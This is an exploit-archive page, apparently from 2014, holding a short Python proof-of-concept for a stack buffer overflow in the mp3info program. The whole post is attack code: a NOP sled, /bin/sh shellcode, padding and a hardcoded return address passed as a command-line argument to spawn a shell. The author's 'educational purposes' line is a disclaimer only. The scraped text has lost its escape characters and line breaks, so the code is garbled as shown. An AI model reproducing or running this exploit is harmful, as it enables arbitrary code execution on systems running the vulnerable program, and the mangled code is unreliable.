Home / exploits Mp3info Stack Buffer Overflow
Posted on 28 January 2014
# Waste of CPU clock N2 # Exploit for: mp3info! Latest version # Author: jsacco - jsacco@exploitpack.com # Vendor: http://ibiblio.org/mp3info/ # No-one-cares-about programs! junk = "x90x90x90x90"*8 shellcode = "x31xc0x50x68//shx68/binx89xe3x50x53x89xe1x99xb0x0bxcdx80" buffer = "x90x90x90x90"*89 eip = "x10xf0xffxbf" print "# MP3info is prone to a Stack-BoF" print "# Wasting CPU clocks on unusable exploits" print "# This is exploit is for educational purposes" try: subprocess.call(["mp3info", junk+shellcode+buffer+eip]) except OSError as e: if e.errno == os.errno.ENOENT: print "MP3Info not found!" else: print "Error executing exploit" raise
